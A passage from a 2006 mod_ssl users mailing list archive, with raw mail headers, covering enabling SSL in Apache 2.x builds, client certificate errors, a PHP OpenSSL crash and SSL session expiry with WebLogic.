and would like to install mod_ssl. I notice that current/latest version =
of mos_ssl
is for Apache-1.x.x version. Is there any way (with a patch) to install =
the
latest version of mod_ssl on Apache-2.x.x?

















 









------=_NextPart_000_0018_01C704B7.742F1F40--

______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Fri Nov 10 21:13:40 2006
Return-Path: 
X-Original-To: modssl-users-L
Delivered-To: modssl-users-L@master.modssl.org
Received: by master.modssl.org (Postfix, from userid 30101)
	id 96E1C14D8AF; Fri, 10 Nov 2006 21:13:40 +0100 (CET)
X-Original-To: modssl-users@modssl.org
Delivered-To: modssl-users@modssl.org
Received: from ug-out-1314.google.com (ug-out-1314.google.com [66.249.92.173])
	by master.modssl.org (Postfix) with ESMTP id 5E26314D853
	for ; Fri, 10 Nov 2006 21:13:39 +0100 (CET)
Received: by ug-out-1314.google.com with SMTP id z35so763467ugc
        for ; Fri, 10 Nov 2006 12:13:23 -0800 (PST)
DomainKey-Signature: a=rsa-sha1; q=dns; c=nofws;
        s=beta; d=gmail.com;
        h=received:message-id:date:from:sender:to:subject:in-reply-to:mime-version:content-type:references:x-google-sender-auth;
        b=Otuk3/VSTeNa1Hbww+0fHYjTTgx0885Nrr2xD7Shco3aBcM6TgCnHP0HtjW/5DoFdxJlJR0+AWTusVdV8oicHEC3vz1NVL1e9Kx6aMDjmsL+FT7qHGbVY7aYy5y75UGVXZvzEWUNlqk1Orn0vQ5IWYkNIOkY9qp2w4pDWdbZXK4=
Received: by 10.78.142.14 with SMTP id p14mr3004881hud.1163189602343;
        Fri, 10 Nov 2006 12:13:22 -0800 (PST)
Received: by 10.78.90.19 with HTTP; Fri, 10 Nov 2006 12:13:22 -0800 (PST)
Message-ID: 
Date: Fri, 10 Nov 2006 15:13:22 -0500
From: "Cliff Woolley" 
To: modssl-users@modssl.org
Subject: Re: Mod_SSL
In-Reply-To: <001701c704e1$5d052740$20ed150c@Sunshine>
MIME-Version: 1.0
Content-Type: multipart/alternative; 
	boundary="----=_Part_61283_31431267.1163189602294"
References: 
	 <001701c704e1$5d052740$20ed150c@Sunshine>
X-Google-Sender-Auth: 1574056f1e43b0f5
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: "Cliff Woolley" 
X-List-Manager: Majordomo [version 1.94.5]
X-List-Name: modssl-users

------=_Part_61283_31431267.1163189602294
Content-Type: text/plain; charset=ISO-8859-1; format=flowed
Content-Transfer-Encoding: 7bit
Content-Disposition: inline

You don't have to patch anything.  It's already in there.

Just add --enable-ssl to the ./configure command line arguments.

--Cliff



On 11/10/06, kbajwa  wrote:
>
>  Cliff:
>
>
>
> You are all right. This is my first try to build a server, so I need
> further help.
>
>
>
> I have downloaded the latest Apache version 'httpd-2.2.3'. I am at the
> point where I need to patch it with 'mod_ssl" module. Can you guide me how
> to patch 'httpd-2.2.3' with the latest version of 'mod_ssl-
> 2.2.828-1.3.37'?
>
>
>
> Thanks in advance.
>
>
>
> Kirt
>
>
>
> -----Original Message-----
> *From:* owner-modssl-users@modssl.org [mailto:
> owner-modssl-users@modssl.org] *On Behalf Of *Cliff Woolley
> *Sent:* Tuesday, November 07, 2006 5:05 PM
> *To:* modssl-users@modssl.org
> *Subject:* Re: Mod_SSL
>
>
>
>
> What this person is getting at is that the reason you can't find a mod_ssl
> patch for Apache 2.x is that mod_ssl comes pre-bundled with Apache 2.x.
> Just enable it when you run configure on the apache build.
>
> --Cliff
>
>  On 11/7/06, *Kong, Yi - HPL*  wrote:
>
> You add ssl arguement when you configure the apache
>
>
>  ------------------------------
>
> *From:* kbajwa [mailto:kbajwa@tibonline.net]
> *Sent:* Tuesday, November 07, 2006 10:22 AM
> *To:* modssl-users@modssl.org
> *Subject:* Mod_SSL
>
> My first posting!  I am installing Apache-2.2.3 and would like to install
> mod_ssl. I notice that current/latest version of mos_ssl is for
> Apache-1.x.x version. Is there any way (with a patch) to install the
> latest version of mod_ssl on Apache-2.x.x?
>
>
>

------=_Part_61283_31431267.1163189602294
Content-Type: text/html; charset=ISO-8859-1
Content-Transfer-Encoding: 7bit
Content-Disposition: inline


You don't have to patch anything.  It's already in there.

Just add --enable-ssl to the ./configure command line arguments.

--Cliff



On 11/10/06, 
kbajwa <kbajwa@tibonline.net> wrote:




















Cliff:



 



You are all right. This is my first try to
build a server, so I need further help.



 



I have downloaded the latest Apache
version 'httpd-2.2.3'. I am at the point where I need to patch it
with 'mod_ssl" module. Can you guide me how to patch 'httpd-2.2.3'
with the latest version of 'mod_ssl-2.2.828-1.3.37'?



 



Thanks in advance.



 



Kirt



 



-----Original Message-----

From:
owner-modssl-users@modssl.org [mailto:
owner-modssl-users@modssl.org] On Behalf Of Cliff Woolley

Sent: Tuesday, November 07, 2006
5:05 PM

To: modssl-users@modssl.org

Subject: Re: Mod_SSL



 





What this person is getting at is that the reason you can't find a mod_ssl
patch for Apache 2.x is that mod_ssl comes pre-bundled with Apache 2.x. 
Just enable it when you run configure on the apache build.



--Cliff 










On 11/7/06, Kong, Yi - HPL <
Yi.Kong@cityofhouston.net>
wrote:






You add ssl arguement
when you configure the apache



 












From:
 kbajwa
[mailto:kbajwa@tibonline.net]


Sent: Tuesday, November 07, 2006
10:22 AM

To: modssl-users@modssl.org

Subject: Mod_SSL









My first posting!  I am installing Apache-2.2.3
and would like to install mod_ssl. I notice that current/latest version of mos_ssl
is for Apache-1.x.x version. Is there any way (with a patch) to install the
latest version of mod_ssl on Apache-2.x.x?

















 














------=_Part_61283_31431267.1163189602294--
______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Tue Nov 14 17:44:15 2006
Return-Path: 
X-Original-To: modssl-users-L
Delivered-To: modssl-users-L@master.modssl.org
Received: by master.modssl.org (Postfix, from userid 30101)
	id C9CCE14D876; Tue, 14 Nov 2006 17:44:15 +0100 (CET)
X-Original-To: modssl-users@modssl.org
Delivered-To: modssl-users@modssl.org
Received: from web32408.mail.mud.yahoo.com (web32408.mail.mud.yahoo.com [68.142.207.201])
	by master.modssl.org (Postfix) with SMTP id F01AA14D85E
	for ; Tue, 14 Nov 2006 17:44:14 +0100 (CET)
Received: (qmail 15847 invoked by uid 60001); 14 Nov 2006 16:43:56 -0000
DomainKey-Signature: a=rsa-sha1; q=dns; c=nofws;
  s=s1024; d=yahoo.com;
  h=X-YMail-OSG:Received:Date:From:Subject:To:MIME-Version:Content-Type:Content-Transfer-Encoding:Message-ID;
  b=u8Pf0khD1Z8+wQvdvXE3IUKaBfonNVUOI+9wC2mMFN3fVaWky8xFiDjP+iNDQp/+biKAH/byly03EESdF7/KsnNxcmvMz0jzohgeCRrugYAHu6Oj9+xbabvGaiCdp2Y6YVdYpgbtUu9o2xxX9ky/ACI2igyFhWDszsB1N1XM8NM=;
X-YMail-OSG: L_erF_AVM1lt7x347yDJEQfTkpsXOMFGAq9suSDA
Received: from [213.8.95.176] by web32408.mail.mud.yahoo.com via HTTP; Tue, 14 Nov 2006 08:43:56 PST
Date: Tue, 14 Nov 2006 08:43:56 -0800 (PST)
From: Jacob Sarusi 
Subject: SSL web server configuration
To: modssl-users@modssl.org
MIME-Version: 1.0
Content-Type: multipart/alternative; boundary="0-1362401121-1163522636=:14143"
Content-Transfer-Encoding: 8bit
Message-ID: <355221.14143.qm@web32408.mail.mud.yahoo.com>
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: Jacob Sarusi 
X-List-Manager: Majordomo [version 1.94.5]
X-List-Name: modssl-users

--0-1362401121-1163522636=:14143
Content-Type: text/plain; charset=iso-8859-1
Content-Transfer-Encoding: 8bit

I have a web-site supporting HTTPS.
  Everything is OK interfacing web browsers like IE.
  Lately I needed to interface with a Java client, full connection can not be establish.
  In order to debug I used:
  openssl s_server -cipher 'ALL:!ADH:!EXPORT56:RC4+RSA:+HIGH:+SSLv2:-EXP:+eNULL' -cert /etc/httpd/conf/ssl.crt/server.crt -key /etc/httpd/conf/ssl.key/server.key -accept 443 -debug  -state -HTTP
  where the indicated cipher is the exact ciphersuit I have in the web server, and cert and key are the same a the ones used in my web server. 
   
  Using the openssl in debug, Java client receives the response.
  I am trying to understand the difference in web server behavior and openssl in debug mode behavior. Why when in debug, everything goes well, while in web server mode, it fails?
   
  my server conf:
  SSLEngine on
SSLCipherSuite ALL:!ADH:!EXPORT56:RC4+RSA:+HIGH:+SSLv2:-EXP:+eNULL
SSLCertificateFile /etc/httpd/conf/ssl.crt/server.crt
SSLCertificateKeyFile /etc/httpd/conf/ssl.key/server.key
SSLOptions +StdEnvVars
SetEnvIf User-Agent ".*MSIE.*" \
        nokeepalive ssl-unclean-shutdown \
        downgrade-1.0 force-response-1.0
CustomLog logs/tranzit_ssl_request_log clfa
   
  Hope there is someone that can help.
  Jacob
   
   

 	
---------------------------------
Everyone is raving about the all-new Yahoo! Mail beta.
--0-1362401121-1163522636=:14143
Content-Type: text/html; charset=iso-8859-1
Content-Transfer-Encoding: 8bit


I have a web-site supporting HTTPS.
  
Everything is OK interfacing web browsers like IE.
  
Lately I needed to interface with a Java client, full connection can not be establish.
  
In order to debug I used:
  
openssl s_server -cipher 'ALL:!ADH:!EXPORT56:RC4+RSA:+HIGH:+SSLv2:-EXP:+eNULL' -cert /etc/httpd/conf/ssl.crt/server.crt -key /etc/httpd/conf/ssl.key/server.key -accept 443 -debug  -state -HTTP
  
where the indicated cipher is the exact ciphersuit I have in the web server, and cert and key are the same a the ones used in my web server. 
  
 
  
Using the openssl in debug, Java client receives the response.
  
I am trying to understand the difference in web server behavior and openssl in debug mode behavior. Why when in debug, everything goes well, while in web server mode, it fails?
  
 
  
my server conf:
  
SSLEngine on
SSLCipherSuite
 ALL:!ADH:!EXPORT56:RC4+RSA:+HIGH:+SSLv2:-EXP:+eNULL
SSLCertificateFile /etc/httpd/conf/ssl.crt/server.crt
SSLCertificateKeyFile /etc/httpd/conf/ssl.key/server.key
SSLOptions +StdEnvVars
SetEnvIf User-Agent ".*MSIE.*" \
        nokeepalive ssl-unclean-shutdown \
        downgrade-1.0 force-response-1.0
CustomLog logs/tranzit_ssl_request_log clfa
  
 
  
Hope there is someone that can help.
  
Jacob
  
 
  
 
 
	




Everyone is raving about the all-new Yahoo! Mail beta.
--0-1362401121-1163522636=:14143--
______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Tue Nov 14 18:00:33 2006
Return-Path: 
X-Original-To: modssl-users-L
Delivered-To: modssl-users-L@master.modssl.org
Received: by master.modssl.org (Postfix, from userid 30101)
	id 4E34D14D876; Tue, 14 Nov 2006 18:00:33 +0100 (CET)
X-Original-To: modssl-users@modssl.org
Delivered-To: modssl-users@modssl.org
Received: from dmz-vsgate2.ldn.ibb.ubs.com (dmz-vsgate2.ldn.ibb.ubs.com [139.149.1.205])
	by master.modssl.org (Postfix) with ESMTP id 0E34014D85E
	for ; Tue, 14 Nov 2006 18:00:32 +0100 (CET)
Received: from sldn0848xmh.ldn.swissbank.com (localhost [127.0.0.1])
	by sldn0848xmh.ldn.swissbank.com (8.11.7+Sun/8.8.8) with ESMTP id kAEH0Cb01496
	for ; Tue, 14 Nov 2006 17:00:12 GMT
Received: (from smap@localhost)
	by sldn0848xmh.ldn.swissbank.com (8.11.7+Sun/8.8.8) id kAEH09g01348
	for ; Tue, 14 Nov 2006 17:00:09 GMT
Received: from  (inside [139.149.41.81]) by sldn0848xmh.ldn.swissbank.com via smap (V2.0b/ubs)
	id xma001010; Tue, 14 Nov 2006 16:59:50 GMT
Received: from nldn2383pap.ubsw.net (nldn2383pap.ldn.swissbank.com [139.149.215.235])
	by sldn0845pmh.ldn.swissbank.com (8.11.7+Sun/8.8.8) with ESMTP id kAEGwOd20175
	for ; Tue, 14 Nov 2006 16:58:24 GMT
From: Vishal.Sharma@ubs.com
Received: from NLDNC101PEX1.ubsw.net ([139.149.215.134]) by nldn2383pap.ubsw.net with Microsoft SMTPSVC(6.0.3790.1830);
	 Tue, 14 Nov 2006 16:58:24 +0000
X-MimeOLE: Produced By Microsoft Exchange V6.5
Content-class: urn:content-classes:message
MIME-Version: 1.0
Subject: Client certificate
Date: Tue, 14 Nov 2006 16:58:23 -0000
Message-ID: 
X-MS-Has-Attach: 
X-MS-TNEF-Correlator: 
Thread-Topic: Client certificate
Thread-Index: AccIDhiNRxRm9p4bQ960uLiZlVFo2Q==
To: 
X-OriginalArrivalTime: 14 Nov 2006 16:58:24.0588 (UTC) FILETIME=[190830C0:01C7080E]
X-UBSIB-Journal: yes
Content-Type: multipart/mixed; boundary="retimiled-emim-mijooneldraneldeen"
X-UBS-Disclaimer: Version $Revision: 1.27 $
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: Vishal.Sharma@ubs.com
X-List-Manager: Majordomo [version 1.94.5]
X-List-Name: modssl-users


--retimiled-emim-mijooneldraneldeen
Content-Type: multipart/alternative;
	boundary="----_=_NextPart_001_01C7080E.18D17F13"

This is a multi-part message in MIME format.

------_=_NextPart_001_01C7080E.18D17F13
Content-Type: text/plain;
	charset="US-ASCII"
Content-Transfer-Encoding: quoted-printable

Hi ,
I am trying to implement client authentication based on client
certificates.

I want to throw up an error message to the "user/browser" in case client
certificate is invalid.

What I got was that "The page cannot be displayed" error if an
invalid(expired one) client certificate is sent and I see the following
in the logs.
=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=
=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=
=3D=3D=3D=3D=3D=3D=3D=3D
[Tue Nov 14 16:52:53 2006] [info] [client 14.64.53.89] client stopped
connection before rflush completed
[Tue Nov 14 16:52:57 2006] [error] mod_ssl: Certificate Verification:
Error (10): certificate has expired
[Tue Nov 14 16:52:57 2006] [error] mod_ssl: Re-negotiation handshake
failed: Not accepted by client!?
[Tue Nov 14 16:52:57 2006] [error] mod_ssl: Certificate Verification:
Error (10): certificate has expired
[Tue Nov 14 16:52:57 2006] [error] mod_ssl: SSL error on writing data
(OpenSSL library error follows)
[Tue Nov 14 16:52:57 2006] [error] OpenSSL: error:140890B2:SSL
routines:SSL3_GET_CLIENT_CERTIFICATE:no certif
icate returned
[Tue Nov 14 16:52:57 2006] [info] [client 14.64.53.89] client stopped
connection before rflush completed
=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=
=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=
=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D
=3D=3D=3D=3D

Ideally , I would like to be able to find that the client certificate
has expired using the "SSL_Client....." variables and be able to give
user some error message.

Is it possible?

Thanks,
Vishal





------_=_NextPart_001_01C7080E.18D17F13
Content-Type: text/html;
	charset="US-ASCII"
Content-Transfer-Encoding: quoted-printable






Client certificate





Hi ,


I am trying to implement client =
authentication based on client certificates.




I want to throw up an error message to =
the "user/browser" in case client certificate is =
invalid.




What I got was that =
"The page =
cannot be displayed" error if an invalid(expired one) client =
certificate is sent and I see the following in the logs.



=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=
=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=
=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D


[Tue Nov 14 16:52:53 2006] [info] [client =
14.64.53.89] client stopped connection before rflush completed


[Tue Nov 14 16:52:57 2006] =
[error] mod_ssl: Certificate Verification: Error (10): certificate has =
expired


[Tue Nov 14 16:52:57 2006] =
[error] mod_ssl: Re-negotiation handshake failed: Not accepted by =
client!?


[Tue Nov 14 16:52:57 2006] =
[error] mod_ssl: Certificate Verification: Error (10): certificate has =
expired


[Tue Nov 14 16:52:57 2006] =
[error] mod_ssl: SSL error on writing data (OpenSSL library error =
follows)


[Tue Nov 14 16:52:57 2006] =
[error] OpenSSL: error:140890B2:SSL =
routines:SSL3_GET_CLIENT_CERTIFICATE:no certif


icate returned


[Tue Nov 14 16:52:57 2006] =
[info] [client 14.64.53.89] client stopped connection before rflush =
completed


=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=
=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=
=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=
=3D=3D=3D=3D




Ideally , I would like to be =
able to find that the client certificate has expired using the =
"SSL_Client….." variables and be able to give user some =
error message.



Is it possible?




Thanks,


Vishal











------_=_NextPart_001_01C7080E.18D17F13--

--retimiled-emim-mijooneldraneldeen
Content-Type: text/plain; charset=us-ascii; name="disclaim.txt"
Content-Transfer-Encoding: 7bit
Content-Disposition: inline
Content-Description: Legal Disclaimer


Visit our website at http://www.ubs.com

This message contains confidential information and is intended only 
for the individual named.  If you are not the named addressee you 
should not disseminate, distribute or copy this e-mail.  Please 
notify the sender immediately by e-mail if you have received this 
e-mail by mistake and delete this e-mail from your system.

E-mail transmission cannot be guaranteed to be secure or error-free 
as information could be intercepted, corrupted, lost, destroyed, 
arrive late or incomplete, or contain viruses.  The sender therefore 
does not accept liability for any errors or omissions in the contents 
of this message which arise as a result of e-mail transmission.  If 
verification is required please request a hard-copy version.  This 
message is provided for informational purposes and should not be 
construed as a solicitation or offer to buy or sell any securities or 
related financial instruments.

--retimiled-emim-mijooneldraneldeen--
______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Thu Nov 16 16:39:22 2006
Return-Path: 
X-Original-To: modssl-users-L
Delivered-To: modssl-users-L@master.modssl.org
Received: by master.modssl.org (Postfix, from userid 30101)
	id 361F514D87F; Thu, 16 Nov 2006 16:39:22 +0100 (CET)
X-Original-To: modssl-users@modssl.org
Delivered-To: modssl-users@modssl.org
Received: from smtp-vbr9.xs4all.nl (smtp-vbr9.xs4all.nl [194.109.24.29])
	by master.modssl.org (Postfix) with ESMTP id DD54E14D841
	for ; Thu, 16 Nov 2006 16:39:21 +0100 (CET)
Received: from [10.0.0.37] (futura.xs4all.nl [80.126.247.100])
	by smtp-vbr9.xs4all.nl (8.13.8/8.13.8) with ESMTP id kAGFcwrE063126
	for ; Thu, 16 Nov 2006 16:39:03 +0100 (CET)
	(envelope-from jaap@futura.nl)
Mime-Version: 1.0 (Apple Message framework v624)
Content-Transfer-Encoding: 7bit
Message-Id: <6106d96376b8d2cd601a69c7672b65ab@futura.nl>
Content-Type: text/plain; charset=US-ASCII; format=flowed
To: modssl-users@modssl.org
From: jaap 
Subject: Apache 1.3.7+mod_ssl2.8.28+php4.4.4 crashes using openssl_get_privatekey
Date: Thu, 16 Nov 2006 16:38:58 +0100
X-Mailer: Apple Mail (2.624)
X-Virus-Scanned: by XS4ALL Virus Scanner
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: jaap 
X-List-Manager: Majordomo [version 1.94.5]
X-List-Name: modssl-users

Hey guys,

Apache 1.3.7+mod_ssl2.8.28+php4.4.4 crashes when using the php function 
openssl_get_privatekey

(multiple tries to load the page) :

Allowed memory size of 20971520 bytes exhausted (tried to allocate 83 
bytes)
*** glibc detected *** double free or corruption (!prev): 
0x0000000000f3ab90 ***
[Thu Nov 16 15:45:17 2006] [notice] child pid 23732 exit signal Aborted 
(6)
Allowed memory size of 20971520 bytes exhausted (tried to allocate 83 
bytes)
Allowed memory size of 20971520 bytes exhausted (tried to allocate 83 
bytes)
*** glibc detected *** double free or corruption (!prev): 
0x0000000000f35250 ***
[Thu Nov 16 15:46:42 2006] [notice] child pid 24025 exit signal Aborted 
(6)
*** glibc detected *** double free or corruption (!prev): 
0x0000000000d35190 ***
Allowed memory size of 20971520 bytes exhausted (tried to allocate 83 
bytes)
[Thu Nov 16 15:52:15 2006] [notice] child pid 24028 exit signal Aborted 
(6)
*** glibc detected *** double free or corruption (!prev): 
0x0000000000d35130 ***
Allowed memory size of 20971520 bytes exhausted (tried to allocate 83 
bytes)
[Thu Nov 16 15:52:23 2006] [notice] child pid 24040 exit signal Aborted 
(6)
Allowed memory size of 20971520 bytes exhausted (tried to allocate 83 
bytes)
Allowed memory size of 20971520 bytes exhausted (tried to allocate 83 
bytes)
*** glibc detected *** double free or corruption (!prev): 
0x0000000000d353f0 ***
[Thu Nov 16 15:56:08 2006] [notice] child pid 24029 exit signal Aborted 
(6)
*** glibc detected *** double free or corruption (!prev): 
0x0000000000cf2410 ***
[Thu Nov 16 15:56:53 2006] [notice] child pid 24038 exit signal Aborted 
(6)
*** glibc detected *** double free or corruption (!prev): 
0x0000000000f634a0 ***
[Thu Nov 16 15:59:07 2006] [notice] child pid 24036 exit signal Aborted 
(6)
*** glibc detected *** double free or corruption (!prev): 
0x0000000000dd3ff0 ***
[Thu Nov 16 16:00:08 2006] [notice] child pid 24107 exit signal Aborted 
(6)
*** glibc detected *** double free or corruption (!prev): 
0x0000000000f43a70 ***
[Thu Nov 16 16:00:48 2006] [notice] child pid 23738 exit signal Aborted 
(6)
*** glibc detected *** double free or corruption (!prev): 
0x0000000000e16580 ***
[Thu Nov 16 16:01:44 2006] [notice] child pid 24037 exit signal Aborted 
(6)
*** glibc detected *** double free or corruption (!prev): 
0x0000000000dd3ff0 ***
[Thu Nov 16 16:02:39 2006] [notice] child pid 24123 exit signal Aborted 
(6)
Allowed memory size of 20971520 bytes exhausted (tried to allocate 83 
bytes)
Allowed memory size of 20971520 bytes exhausted (tried to allocate 83 
bytes)
*** glibc detected *** double free or corruption (!prev): 
0x0000000000e162c0 ***
[Thu Nov 16 16:11:40 2006] [notice] child pid 24137 exit signal Aborted 
(6)
*** glibc detected *** double free or corruption (!prev): 
0x0000000000f43ff0 ***
[Thu Nov 16 16:11:59 2006] [notice] child pid 24138 exit signal Aborted 
(6)

I wonder.. which of these makes it crash? all compiled under centos 4.4 
64bit

Jaap van Strien

______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Mon Nov 20 16:07:53 2006
Return-Path: 
X-Original-To: modssl-users-L
Delivered-To: modssl-users-L@master.modssl.org
Received: by master.modssl.org (Postfix, from userid 30101)
	id 07DD014D899; Mon, 20 Nov 2006 16:07:53 +0100 (CET)
X-Original-To: modssl-users@modssl.org
Delivered-To: modssl-users@modssl.org
Received: from IMSSOUT1.minfin.be (gw.minfin.be [193.191.216.49])
	by master.modssl.org (Postfix) with ESMTP id BE24414D835
	for ; Mon, 20 Nov 2006 16:07:47 +0100 (CET)
Received: from finmfe3.minfin.fed.be ([10.2.31.15]) by IMSSOUT1.minfin.be with InterScan Message Security Suite; Mon, 20 Nov 2006 16:08:56 +0100
Received: from BEBRULiboisC ([10.12.2.151])
 by finmfe3.minfin.fed.be (Sun Java System Messaging Server 6.2-1 (built Feb 24
 2005)) with SMTP id <0J9100DD3BCFUE40@minfin.fed.be> for
 modssl-users@modssl.org; Mon, 20 Nov 2006 16:07:28 +0100 (CET)
Date: Mon, 20 Nov 2006 16:07:26 +0100
From: Claude Libois 
Subject: How to notified application server that ssl session has expired.
To: modssl-users@modssl.org
Message-id: <00e701c70cb5$9729c760$97020c0a@eu.uis.unisys.com>
MIME-version: 1.0
X-MIMEOLE: Produced By Microsoft MimeOLE V6.00.2900.2962
X-Mailer: Microsoft Outlook Express 6.00.2900.2180
Content-type: text/plain; format=flowed; charset=iso-8859-1; reply-type=original
Content-transfer-encoding: 7BIT
X-Priority: 3
X-MSMail-priority: Normal
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: Claude Libois 
X-List-Manager: Majordomo [version 1.94.5]
X-List-Name: modssl-users

Hello
For our project we have integrated an electronical identity card( eID) 
authentication. This card contains a certificate that is used to establish 
an ssl two ways connection with our apache 2.0.54. This certificate is 
validated by an OCSP server.
When ssl connections is established, user's certificate is forwarded to a 
J2EE application server (weblogic) which create it's own security context 
throug a JAAS LoginModule.
Our problem is that we have to (we don't have the choice)  unloged user when 
ssl session has expired.
So my problem is to notify weblogic that ssl session has expired.
My first idea was to save SSL_SESSION_ID in my J2EE Principal and then 
compare this id with the current ssl session id of the request.
So if the current id is different than the id obtained during the 
authentication process then the user is unloged.
However, it seems that when I configure a virtualhost in ssl one 
ways(SSLVerifyClient none) with a per-directory ssl two ways, sometimes my 
ssl session is renewed and
my ssl session id is different. If I configure two-ways at virtualhost level 
this doesn't happen.
Is there a problem for apache to maintains ssl session if we change the ssl 
type?
I read on an older post that we can't rely on SSL_SESSION_ID to know if ssl 
has expired but I don't see any other way to notify my application server.
Any suggestion?

Here is my ssl.conf.For information I have specific application apart from 
the main application which is responsible of the authentication.

AddType application/x-x509-ca-cert .crt
AddType application/x-pkcs7-crl    .crl
SSLSessionCache        shmcb:logs/ssl_scache(512000)
SSLSessionCacheTimeout  300
SSLMutex  file:/home/apache-2.0.54/logs/ssl_mutex
SLRandomSeed startup builtin

      ServerName host
      ServerAlias host
      DocumentRoot "/home/apache-2.0.54/htdocs"
      SSLEngine on
      SSLCipherSuite -ALL:SSLv3+HIGH:-aNULL!EXPORT56:RC4+RSA
      SSLProtocol -ALL +SSLv3 +TLSv1
      # Server Certificate:
      SSLCertificateFile 
/home/apache-2.0.54/conf/ssl/certificate/server/host.cert
      # Server Private Key:
      SSLCertificateKeyFile 
/home/apache-2.0.54/conf/ssl/certificate/server/privkey.key
      SSLCertificateChainFile 
"/home/apache-2.0.54/conf/ssl/certificate/chain/chain.pem
      SSLOptions +StrictRequire +StdEnvVars +ExportCertData
      RequestHeader add SSL_SESSION_ID "%{SSL_SESSION_ID}e"
      SetEnvIf User-Agent ".*MSIE.*" ssl-unclean-shutdown
      SSLVerifyClient  none
      SSLCACertificateFile 
"/home/weblogic/apache-2.0.54/conf/ssl/certificate/trusted_certificate/client-trusted-list.pem"
    #Application that does the authentication
    
      SetHandler weblogic-handler
     WebLogicCluster host:7001
    
    #main application that needs authentication
    
      SetHandler weblogic-handler
     WebLogicCluster host:7001
    
    #Two-ways connection is only established when calling this struts action
      
      SSLVerifyClient require
      RequestHeader add WL-Proxy-SSL "true"
      RequestHeader set SSL_CLIENT_CERT "%{SSL_CLIENT_CERT}e"
      RequestHeader add SSL_CLIENT_S_DN "%{SSL_CLIENT_S_DN}e"
      Allow from all
       

    


______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Wed Nov 22 10:46:57 2006
Return-Path: 
X-Original-To: modssl-users-L
Delivered-To: modssl-users-L@master.modssl.org
Received: by master.modssl.org (Postfix, from userid 30101)
	id 3765614D9DB; Wed, 22 Nov 2006 10:46:57 +0100 (CET)
X-Original-To: modssl-users@modssl.org
Delivered-To: modssl-users@modssl.org
Received: from 114.zone-217.12.18.juntadeandalucia.es (114.zone-217.12.18.juntadeandalucia.es [217.12.18.114])
	by master.modssl.org (Postfix) with ESMTP id 6B8B414D84F
	for ; Wed, 22 Nov 2006 10:46:55 +0100 (CET)
Received: from [10.240.216.77] (helo=mail.juntadeandalucia.es)
	by guadix2.juntadeandalucia.es with esmtps (TLSv1:AES256-SHA:256)
	(Exim 4.60)
	(envelope-from )
	id 1Gmoge-00050k-AZ
	for modssl-users@modssl.org; Wed, 22 Nov 2006 10:46:36 +0100
Received: from [10.241.130.22] (helo=IUSEXCHHV01.justicia.junta-andalucia.es)
	by mail.juntadeandalucia.es with esmtp (Exim 4.60)
	(envelope-from )
	id 1Gmoge-0006PD-6T
	for modssl-users@modssl.org; Wed, 22 Nov 2006 10:46:36 +0100
X-MimeOLE: Produced By Microsoft Exchange V6.5
Content-class: urn:content-classes:message
MIME-Version: 1.0
Content-Type: multipart/alternative;
	boundary="----_=_NextPart_001_01C70E1B.19CE8406"
Subject: About FakeBasicAuth
Date: Wed, 22 Nov 2006 10:46:35 +0100
Message-ID: <0F56DC121ABBE641A2E5958282B6A07401A9A9D6@IUSEXCHHV01.justicia.junta-andalucia.es>
X-MS-Has-Attach: 
X-MS-TNEF-Correlator: 
Thread-Topic: About FakeBasicAuth
Thread-Index: AccOGxlHY3b5/0w5T3u9OjhKIpYGmA==
From: "Luis Carlos Peinado Bravo" 
To: 
X-Spam-Score: -1.4 (-)
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: "Luis Carlos Peinado Bravo" 
X-List-Manager: Majordomo [version 1.94.5]
X-List-Name: modssl-users

